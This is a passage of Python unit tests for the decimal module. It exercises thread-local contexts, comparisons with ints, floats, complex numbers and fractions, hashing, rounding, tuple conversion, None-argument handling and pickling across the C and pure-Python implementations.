DivisionByZero = cls.decimal.DivisionByZero
Overflow = cls.decimal.Overflow
Underflow = cls.decimal.Underflow
Inexact = cls.decimal.Inexact
getcontext = cls.decimal.getcontext
localcontext = cls.decimal.localcontext
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
thiscontext = getcontext()
thiscontext.prec = 18
test2 = d1/d3
with localcontext() as c2:
cls.assertTrue(c2.flags[Inexact])
cls.assertRaises(Overflow, c2.multiply, Decimal('1e425000000'), 999)
cls.assertTrue(c2.flags[Overflow])
with localcontext(thiscontext) as c3:
cls.assertTrue(c3.flags[Inexact])
cls.assertFalse(c3.flags[Overflow])
c3.traps[Underflow] = True
cls.assertRaises(Underflow, c3.divide, Decimal('1e-425000000'), 999)
cls.assertTrue(c3.flags[Underflow])
del c3
cls.assertFalse(c2.flags[Underflow])
cls.assertFalse(c2.traps[Underflow])
del c2
cls.synchro.set()
cls.finish2.set()
cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333'))
cls.assertFalse(thiscontext.traps[Underflow])
cls.assertTrue(thiscontext.flags[Inexact])
for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
cls.assertFalse(thiscontext.flags[sig])
class ThreadingTest(unittest.TestCase):
'''Unit tests for thread local contexts in Decimal.'''
# Take care executing this test from IDLE, there's an issue in threading
# that hangs IDLE and I couldn't find it
def test_threading(self):
DefaultContext = self.decimal.DefaultContext
if self.decimal == C and not self.decimal.HAVE_THREADS:
self.skipTest("compiled without threading")
# Test the "threading isolation" of a Context. Also test changing
# the DefaultContext, which acts as a template for the thread-local
# contexts.
save_prec = DefaultContext.prec
save_emax = DefaultContext.Emax
save_emin = DefaultContext.Emin
DefaultContext.prec = 24
DefaultContext.Emax = 425000000
DefaultContext.Emin = -425000000
self.synchro = threading.Event()
self.finish1 = threading.Event()
self.finish2 = threading.Event()
th1 = threading.Thread(target=thfunc1, args=(self,))
th2 = threading.Thread(target=thfunc2, args=(self,))
th1.start()
th2.start()
self.finish1.wait()
self.finish2.wait()
for sig in Signals[self.decimal]:
self.assertFalse(DefaultContext.flags[sig])
th1.join()
th2.join()
DefaultContext.prec = save_prec
DefaultContext.Emax = save_emax
DefaultContext.Emin = save_emin
class CThreadingTest(ThreadingTest):
decimal = C
class PyThreadingTest(ThreadingTest):
decimal = P
class UsabilityTest(unittest.TestCase):
'''Unit tests for Usability cases of Decimal.'''
def test_comparison_operators(self):
Decimal = self.decimal.Decimal
da = Decimal('23.42')
db = Decimal('23.42')
dc = Decimal('45')
#two Decimals
self.assertGreater(dc, da)
self.assertGreaterEqual(dc, da)
self.assertLess(da, dc)
self.assertLessEqual(da, dc)
self.assertEqual(da, db)
self.assertNotEqual(da, dc)
self.assertLessEqual(da, db)
self.assertGreaterEqual(da, db)
#a Decimal and an int
self.assertGreater(dc, 23)
self.assertLess(23, dc)
self.assertEqual(dc, 45)
#a Decimal and uncomparable
self.assertNotEqual(da, 'ugly')
self.assertNotEqual(da, 32.7)
self.assertNotEqual(da, object())
self.assertNotEqual(da, object)
# sortable
a = list(map(Decimal, range(100)))
b = a[:]
random.shuffle(a)
a.sort()
self.assertEqual(a, b)
def test_decimal_float_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertLess(da, 3.0)
self.assertLessEqual(da, 3.0)
self.assertGreater(db, 0.25)
self.assertGreaterEqual(db, 0.25)
self.assertNotEqual(da, 1.5)
self.assertEqual(da, 0.25)
self.assertGreater(3.0, da)
self.assertGreaterEqual(3.0, da)
self.assertLess(0.25, db)
self.assertLessEqual(0.25, db)
self.assertNotEqual(0.25, db)
self.assertEqual(3.0, db)
self.assertNotEqual(0.1, Decimal('0.1'))
def test_decimal_complex_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertNotEqual(da, (1.5+0j))
self.assertNotEqual((1.5+0j), da)
self.assertEqual(da, (0.25+0j))
self.assertEqual((0.25+0j), da)
self.assertEqual((3.0+0j), db)
self.assertEqual(db, (3.0+0j))
self.assertNotEqual(db, (3.0+1j))
self.assertNotEqual((3.0+1j), db)
self.assertIs(db.__lt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
self.assertIs(db.__gt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
def test_decimal_fraction_comparison(self):
D = self.decimal.Decimal
F = fractions[self.decimal].Fraction
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
emax = C.MAX_EMAX if C else 999999999
emin = C.MIN_EMIN if C else -999999999
etiny = C.MIN_ETINY if C else -1999999997
c = Context(Emax=emax, Emin=emin)
with localcontext(c):
c.prec = emax
self.assertLess(D(0), F(1,9999999999999999999999999999999999999))
self.assertLess(F(-1,9999999999999999999999999999999999999), D(0))
self.assertLess(F(0,1), D("1e" + str(etiny)))
self.assertLess(D("-1e" + str(etiny)), F(0,1))
self.assertLess(F(0,9999999999999999999999999), D("1e" + str(etiny)))
self.assertLess(D("-1e" + str(etiny)), F(0,9999999999999999999999999))
self.assertEqual(D("0.1"), F(1,10))
self.assertEqual(F(1,10), D("0.1"))
c.prec = 300
self.assertNotEqual(D(1)/3, F(1,3))
self.assertNotEqual(F(1,3), D(1)/3)
self.assertLessEqual(F(120984237, 9999999999), D("9e" + str(emax)))
self.assertGreaterEqual(D("9e" + str(emax)), F(120984237, 9999999999))
self.assertGreater(D('inf'), F(99999999999,123))
self.assertGreater(D('inf'), F(-99999999999,123))
self.assertLess(D('-inf'), F(99999999999,123))
self.assertLess(D('-inf'), F(-99999999999,123))
self.assertRaises(InvalidOperation, D('nan').__gt__, F(-9,123))
self.assertIs(NotImplemented, F(-9,123).__lt__(D('nan')))
self.assertNotEqual(D('nan'), F(-9,123))
self.assertNotEqual(F(-9,123), D('nan'))
def test_copy_and_deepcopy_methods(self):
Decimal = self.decimal.Decimal
d = Decimal('43.24')
c = copy.copy(d)
self.assertEqual(id(c), id(d))
dc = copy.deepcopy(d)
self.assertEqual(id(dc), id(d))
def test_hash_method(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
def hashit(d):
a = hash(d)
b = d.__hash__()
self.assertEqual(a, b)
return a
#just that it's hashable
hashit(Decimal(23))
hashit(Decimal('Infinity'))
hashit(Decimal('-Infinity'))
hashit(Decimal('nan123'))
hashit(Decimal('-NaN'))
test_values = [Decimal(sign*(2**m + n))
for m in [0, 14, 15, 16, 17, 30, 31,
32, 33, 61, 62, 63, 64, 65, 66]
for n in range(-10, 10)
for sign in [-1, 1]]
test_values.extend([
Decimal("-1"), # ==> -2
Decimal("-0"), # zeros
Decimal("0.00"),
Decimal("-0.000"),
Decimal("0E10"),
Decimal("-0E12"),
Decimal("10.0"), # negative exponent
Decimal("-23.00000"),
Decimal("1230E100"), # positive exponent
Decimal("-4.5678E50"),
# a value for which hash(n) != hash(n % (2**64-1))
# in Python pre-2.6
Decimal(2**64 + 2**32 - 1),
# selection of values which fail with the old (before
# version 2.6) long.__hash__
Decimal("1.634E100"),
Decimal("90.697E100"),
Decimal("188.83E100"),
Decimal("1652.9E100"),
Decimal("56531E100"),
])
# check that hash(d) == hash(int(d)) for integral values
for value in test_values:
self.assertEqual(hashit(value), hash(int(value)))
# check that the hashes of a Decimal float match when they
# represent exactly the same values
test_strings = ['inf', '-Inf', '0.0', '-.0e1',
'34.0', '2.5', '112390.625', '-0.515625']
for s in test_strings:
f = float(s)
d = Decimal(s)
self.assertEqual(hashit(d), hash(f))
with localcontext() as c:
# check that the value of the hash doesn't depend on the
# current context (issue #1757)
x = Decimal("123456789.1")
c.prec = 6
h1 = hashit(x)
c.prec = 10
h2 = hashit(x)
c.prec = 16
h3 = hashit(x)
self.assertEqual(h1, h2)
self.assertEqual(h1, h3)
c.prec = 10000
x = 1100 ** 1248
self.assertEqual(hashit(Decimal(x)), hashit(x))
def test_hash_method_nan(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, hash, Decimal('sNaN'))
value = Decimal('NaN')
self.assertEqual(hash(value), object.__hash__(value))
class H:
def __hash__(self):
return 42
class D(Decimal, H):
pass
value = D('NaN')
self.assertEqual(hash(value), object.__hash__(value))
def test_min_and_max_methods(self):
Decimal = self.decimal.Decimal
d1 = Decimal('15.32')
d2 = Decimal('28.5')
l1 = 15
l2 = 28
#between Decimals
self.assertIs(min(d1,d2), d1)
self.assertIs(min(d2,d1), d1)
self.assertIs(max(d1,d2), d2)
self.assertIs(max(d2,d1), d2)
#between Decimal and int
self.assertIs(min(d1,l2), d1)
self.assertIs(min(l2,d1), d1)
self.assertIs(max(l1,d2), d2)
self.assertIs(max(d2,l1), d2)
def test_as_nonzero(self):
Decimal = self.decimal.Decimal
#as false
self.assertFalse(Decimal(0))
#as true
self.assertTrue(Decimal('0.372'))
def test_tostring_methods(self):
#Test str and repr methods.
Decimal = self.decimal.Decimal
d = Decimal('15.32')
self.assertEqual(str(d), '15.32') # str
self.assertEqual(repr(d), "Decimal('15.32')") # repr
def test_tonum_methods(self):
#Test float and int methods.
Decimal = self.decimal.Decimal
d1 = Decimal('66')
d2 = Decimal('15.32')
#int
self.assertEqual(int(d1), 66)
self.assertEqual(int(d2), 15)
#float
self.assertEqual(float(d1), 66)
self.assertEqual(float(d2), 15.32)
#floor
test_pairs = [
('123.00', 123),
('3.2', 3),
('3.54', 3),
('3.899', 3),
('-2.3', -3),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('89891211712379812736.1', 89891211712379812736),
]
for d, i in test_pairs:
self.assertEqual(math.floor(Decimal(d)), i)
self.assertRaises(ValueError, math.floor, Decimal('-NaN'))
self.assertRaises(ValueError, math.floor, Decimal('sNaN'))
self.assertRaises(ValueError, math.floor, Decimal('NaN123'))
self.assertRaises(OverflowError, math.floor, Decimal('Inf'))
self.assertRaises(OverflowError, math.floor, Decimal('-Inf'))
#ceiling
test_pairs = [
('123.00', 123),
('3.2', 4),
('3.54', 4),
('3.899', 4),
('-2.3', -2),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('89891211712379812736.1', 89891211712379812737),
]
for d, i in test_pairs:
self.assertEqual(math.ceil(Decimal(d)), i)
self.assertRaises(ValueError, math.ceil, Decimal('-NaN'))
self.assertRaises(ValueError, math.ceil, Decimal('sNaN'))
self.assertRaises(ValueError, math.ceil, Decimal('NaN123'))
self.assertRaises(OverflowError, math.ceil, Decimal('Inf'))
self.assertRaises(OverflowError, math.ceil, Decimal('-Inf'))
#round, single argument
test_pairs = [
('123.00', 123),
('3.2', 3),
('3.54', 4),
('3.899', 4),
('-2.3', -2),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('-3.5', -4),
('-2.5', -2),
('-1.5', -2),
('-0.5', 0),
('0.5', 0),
('1.5', 2),
('2.5', 2),
('3.5', 4),
]
for d, i in test_pairs:
self.assertEqual(round(Decimal(d)), i)
self.assertRaises(ValueError, round, Decimal('-NaN'))
self.assertRaises(ValueError, round, Decimal('sNaN'))
self.assertRaises(ValueError, round, Decimal('NaN123'))
self.assertRaises(OverflowError, round, Decimal('Inf'))
self.assertRaises(OverflowError, round, Decimal('-Inf'))
#round, two arguments; this is essentially equivalent
#to quantize, which is already extensively tested
test_triples = [
('123.456', -4, '0E+4'),
('123.456', -3, '0E+3'),
('123.456', -2, '1E+2'),
('123.456', -1, '1.2E+2'),
('123.456', 0, '123'),
('123.456', 1, '123.5'),
('123.456', 2, '123.46'),
('123.456', 3, '123.456'),
('123.456', 4, '123.4560'),
('123.455', 2, '123.46'),
('123.445', 2, '123.44'),
('Inf', 4, 'NaN'),
('-Inf', -23, 'NaN'),
('sNaN314', 3, 'NaN314'),
]
for d, n, r in test_triples:
self.assertEqual(str(round(Decimal(d), n)), r)
def test_nan_to_float(self):
# Test conversions of decimal NANs to float.
# See http://bugs.python.org/issue15544
Decimal = self.decimal.Decimal
for s in ('nan', 'nan1234', '-nan', '-nan2468'):
f = float(Decimal(s))
self.assertTrue(math.isnan(f))
sign = math.copysign(1.0, f)
self.assertEqual(sign, -1.0 if s.startswith('-') else 1.0)
def test_snan_to_float(self):
Decimal = self.decimal.Decimal
for s in ('snan', '-snan', 'snan1357', '-snan1234'):
d = Decimal(s)
self.assertRaises(ValueError, float, d)
def test_eval_round_trip(self):
Decimal = self.decimal.Decimal
#with zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(d, eval(repr(d)))
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(d, eval(repr(d)))
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(d, eval(repr(d)))
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(d, eval(repr(d)))
def test_as_tuple(self):
Decimal = self.decimal.Decimal
#with zero
d = Decimal(0)
self.assertEqual(d.as_tuple(), (0, (0,), 0) )
#int
d = Decimal(-45)
self.assertEqual(d.as_tuple(), (1, (4, 5), 0) )
#complicated string
d = Decimal("-4.34913534E-17")
self.assertEqual(d.as_tuple(), (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
# The '0' coefficient is implementation specific to decimal.py.
# It has no meaning in the C-version and is ignored there.
d = Decimal("Infinity")
self.assertEqual(d.as_tuple(), (0, (0,), 'F') )
#leading zeros in coefficient should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), -2) )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), -2) )
d = Decimal( (1, (0, 0, 0), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
d = Decimal( (1, (), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
#leading zeros in NaN diagnostic info should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), 'n') )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), 'n') )
d = Decimal( (1, (0, 0, 0), 'N') )
self.assertEqual(d.as_tuple(), (1, (), 'N') )
d = Decimal( (1, (), 'n') )
self.assertEqual(d.as_tuple(), (1, (), 'n') )
# For infinities, decimal.py has always silently accepted any
# coefficient tuple.
d = Decimal( (0, (0,), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (0, (4, 5, 3, 4), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (1, (0, 2, 7, 1), 'F') )
self.assertEqual(d.as_tuple(), (1, (0,), 'F'))
def test_as_integer_ratio(self):
Decimal = self.decimal.Decimal
# exceptional cases
self.assertRaises(OverflowError,
Decimal.as_integer_ratio, Decimal('inf'))
self.assertRaises(OverflowError,
Decimal.as_integer_ratio, Decimal('-inf'))
self.assertRaises(ValueError,
Decimal.as_integer_ratio, Decimal('-nan'))
self.assertRaises(ValueError,
Decimal.as_integer_ratio, Decimal('snan123'))
for exp in range(-4, 2):
for coeff in range(1000):
for sign in '+', '-':
d = Decimal('%s%dE%d' % (sign, coeff, exp))
pq = d.as_integer_ratio()
p, q = pq
# check return type
self.assertIsInstance(pq, tuple)
self.assertIsInstance(p, int)
self.assertIsInstance(q, int)
# check normalization: q should be positive;
# p should be relatively prime to q.
self.assertGreater(q, 0)
self.assertEqual(math.gcd(p, q), 1)
# check that p/q actually gives the correct value
self.assertEqual(Decimal(p) / Decimal(q), d)
def test_subclassing(self):
# Different behaviours when subclassing Decimal
Decimal = self.decimal.Decimal
class MyDecimal(Decimal):
y = None
d1 = MyDecimal(1)
d2 = MyDecimal(2)
d = d1 + d2
self.assertIs(type(d), Decimal)
d = d1.max(d2)
self.assertIs(type(d), Decimal)
d = copy.copy(d1)
self.assertIs(type(d), MyDecimal)
self.assertEqual(d, d1)
d = copy.deepcopy(d1)
self.assertIs(type(d), MyDecimal)
self.assertEqual(d, d1)
# Decimal(Decimal)
d = Decimal('1.0')
x = Decimal(d)
self.assertIs(type(x), Decimal)
self.assertEqual(x, d)
# MyDecimal(Decimal)
m = MyDecimal(d)
self.assertIs(type(m), MyDecimal)
self.assertEqual(m, d)
self.assertIs(m.y, None)
# Decimal(MyDecimal)
x = Decimal(m)
self.assertIs(type(x), Decimal)
self.assertEqual(x, d)
# MyDecimal(MyDecimal)
m.y = 9
x = MyDecimal(m)
self.assertIs(type(x), MyDecimal)
self.assertEqual(x, d)
self.assertIs(x.y, None)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
# Check results when context given implicitly. (Issue 2478)
c = getcontext()
self.assertEqual(str(Decimal(0).sqrt()),
str(c.sqrt(Decimal(0))))
def test_none_args(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Subnormal = self.decimal.Subnormal
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Clamped = self.decimal.Clamped
with localcontext(Context()) as c:
c.prec = 7
c.Emax = 999
c.Emin = -999
x = Decimal("111")
y = Decimal("1e9999")
z = Decimal("1e-9999")
##### Unary functions
c.clear_flags()
self.assertEqual(str(x.exp(context=None)), '1.609487E+48')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(Overflow, y.exp, context=None)
self.assertTrue(c.flags[Overflow])
self.assertIs(z.is_normal(context=None), False)
self.assertIs(z.is_subnormal(context=None), True)
c.clear_flags()
self.assertEqual(str(x.ln(context=None)), '4.709530')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal(-1).ln, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(x.log10(context=None)), '2.045323')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal(-1).log10, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(x.logb(context=None)), '2')
self.assertRaises(DivisionByZero, Decimal(0).logb, context=None)
self.assertTrue(c.flags[DivisionByZero])
c.clear_flags()
self.assertEqual(str(x.logical_invert(context=None)), '1111000')
self.assertRaises(InvalidOperation, y.logical_invert, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(y.next_minus(context=None)), '9.999999E+999')
self.assertRaises(InvalidOperation, Decimal('sNaN').next_minus, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(y.next_plus(context=None)), 'Infinity')
self.assertRaises(InvalidOperation, Decimal('sNaN').next_plus, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(z.normalize(context=None)), '0')
self.assertRaises(Overflow, y.normalize, context=None)
self.assertTrue(c.flags[Overflow])
self.assertEqual(str(z.number_class(context=None)), '+Subnormal')
c.clear_flags()
self.assertEqual(str(z.sqrt(context=None)), '0E-1005')
self.assertTrue(c.flags[Clamped])
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
self.assertTrue(c.flags[Subnormal])
self.assertTrue(c.flags[Underflow])
c.clear_flags()
self.assertRaises(Overflow, y.sqrt, context=None)
self.assertTrue(c.flags[Overflow])
c.capitals = 0
self.assertEqual(str(z.to_eng_string(context=None)), '1e-9999')
c.capitals = 1
##### Binary functions
c.clear_flags()
ans = str(x.compare(Decimal('Nan891287828'), context=None))
self.assertEqual(ans, 'NaN1287828')
self.assertRaises(InvalidOperation, x.compare, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.compare_signal(8224, context=None))
self.assertEqual(ans, '-1')
self.assertRaises(InvalidOperation, x.compare_signal, Decimal('NaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_and(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.logical_and, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_or(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.logical_or, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_xor(101, context=None))
self.assertEqual(ans, '10')
self.assertRaises(InvalidOperation, x.logical_xor, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.max(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.max, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.max_mag(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.max_mag, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.min(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.min, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.min_mag(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.min_mag, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.remainder_near(101, context=None))
self.assertEqual(ans, '10')
self.assertRaises(InvalidOperation, y.remainder_near, 101, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.rotate(2, context=None))
self.assertEqual(ans, '11100')
self.assertRaises(InvalidOperation, x.rotate, 101, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.scaleb(7, context=None))
self.assertEqual(ans, '1.11E+9')
self.assertRaises(InvalidOperation, x.scaleb, 10000, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.shift(2, context=None))
self.assertEqual(ans, '11100')
self.assertRaises(InvalidOperation, x.shift, 10000, context=None)
self.assertTrue(c.flags[InvalidOperation])
##### Ternary functions
c.clear_flags()
ans = str(x.fma(2, 3, context=None))
self.assertEqual(ans, '225')
self.assertRaises(Overflow, x.fma, Decimal('1e9999'), 3, context=None)
self.assertTrue(c.flags[Overflow])
##### Special cases
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral_value(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_value, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral_exact(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_exact, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_UP
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
self.assertEqual(ans, '1.501')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
self.assertEqual(ans, '1.500')
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=ROUND_UP, context=None))
self.assertEqual(ans, '1.501')
c.clear_flags()
self.assertRaises(InvalidOperation, y.quantize, Decimal('1e-10'), rounding=ROUND_UP, context=None)
self.assertTrue(c.flags[InvalidOperation])
with localcontext(Context()) as context:
context.prec = 7
context.Emax = 999
context.Emin = -999
with localcontext(ctx=None) as c:
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 999)
self.assertEqual(c.Emin, -999)
def test_conversions_from_int(self):
# Check that methods taking a second Decimal argument will
# always accept an integer in place of a Decimal.
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(4).compare(3),
Decimal(4).compare(Decimal(3)))
self.assertEqual(Decimal(4).compare_signal(3),
Decimal(4).compare_signal(Decimal(3)))
self.assertEqual(Decimal(4).compare_total(3),
Decimal(4).compare_total(Decimal(3)))
self.assertEqual(Decimal(4).compare_total_mag(3),
Decimal(4).compare_total_mag(Decimal(3)))
self.assertEqual(Decimal(10101).logical_and(1001),
Decimal(10101).logical_and(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_or(1001),
Decimal(10101).logical_or(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_xor(1001),
Decimal(10101).logical_xor(Decimal(1001)))
self.assertEqual(Decimal(567).max(123),
Decimal(567).max(Decimal(123)))
self.assertEqual(Decimal(567).max_mag(123),
Decimal(567).max_mag(Decimal(123)))
self.assertEqual(Decimal(567).min(123),
Decimal(567).min(Decimal(123)))
self.assertEqual(Decimal(567).min_mag(123),
Decimal(567).min_mag(Decimal(123)))
self.assertEqual(Decimal(567).next_toward(123),
Decimal(567).next_toward(Decimal(123)))
self.assertEqual(Decimal(1234).quantize(100),
Decimal(1234).quantize(Decimal(100)))
self.assertEqual(Decimal(768).remainder_near(1234),
Decimal(768).remainder_near(Decimal(1234)))
self.assertEqual(Decimal(123).rotate(1),
Decimal(123).rotate(Decimal(1)))
self.assertEqual(Decimal(1234).same_quantum(1000),
Decimal(1234).same_quantum(Decimal(1000)))
self.assertEqual(Decimal('9.123').scaleb(-100),
Decimal('9.123').scaleb(Decimal(-100)))
self.assertEqual(Decimal(456).shift(-1),
Decimal(456).shift(Decimal(-1)))
self.assertEqual(Decimal(-12).fma(Decimal(45), 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, Decimal(67)),
Decimal(-12).fma(Decimal(45), Decimal(67)))
class CUsabilityTest(UsabilityTest):
decimal = C
class PyUsabilityTest(UsabilityTest):
decimal = P
class PythonAPItests(unittest.TestCase):
def test_abc(self):
Decimal = self.decimal.Decimal
self.assertTrue(issubclass(Decimal, numbers.Number))
self.assertFalse(issubclass(Decimal, numbers.Real))
self.assertIsInstance(Decimal(0), numbers.Number)
self.assertNotIsInstance(Decimal(0), numbers.Real)
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
Decimal = self.decimal.Decimal
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
d = Decimal('-3.141590000')
p = pickle.dumps(d, proto)
e = pickle.loads(p)
self.assertEqual(d, e)
if C:
# Test interchangeability
x = C.Decimal('-3.123e81723')
y = P.Decimal('-3.123e81723')
sys.modules['decimal'] = C
sx = pickle.dumps(x, proto)
sys.modules['decimal'] = P
r = pickle.loads(sx)
self.assertIsInstance(r, P.Decimal)
self.assertEqual(r, y)
sys.modules['decimal'] = P
sy = pickle.dumps(y, proto)
sys.modules['decimal'] = C
r = pickle.loads(sy)
self.assertIsInstance(r, C.Decimal)
self.assertEqual(r, x)
x = C.Decimal('-3.123e81723').as_tuple()
y = P.Decimal('-3.123e81723').as_tuple()
sys.modules['decimal'] = C
sx = pickle.dumps(x, proto)
sys.modules['decimal'] = P
r = pickle.loads(sx)
self.assertIsInstance(r, P.DecimalTuple)
self.assertEqual(r, y)
sys.modules['decimal'] = P
sy = pickle.dumps(y, proto)
sys.modules['decimal'] = C
r = pickle.loads(sy)
self.assertIsInstance(r, C.DecimalTuple)
self.assertEqual(r, x)
sys.modules['decimal'] = savedecimal
def test_int(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(int(d)), r)
self.assertRaises(ValueError, int, Decimal('-nan'))
self.assertRaises(ValueError, int, Decimal('snan'))
self.assertRaises(OverflowError, int, Decimal('inf'))
self.assertRaises(OverflowError, int, Decimal('-inf'))
def test_trunc(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(math.trunc(d)), r)
def test_from_float(self):
Decimal = self.decimal.Decimal
class MyDecimal(Decimal):
def __init__(self, _):
self.x = 'y'
self.assertTrue(issubclass(MyDecimal, Decimal))
r = MyDecimal.from_float(0.1)
self.assertEqual(type(r), MyDecimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
self.assertEqual(r.x, 'y')
bigint = 12345678901234567890123456789
self.assertEqual(MyDecimal.from_float(bigint), MyDecimal(bigint))
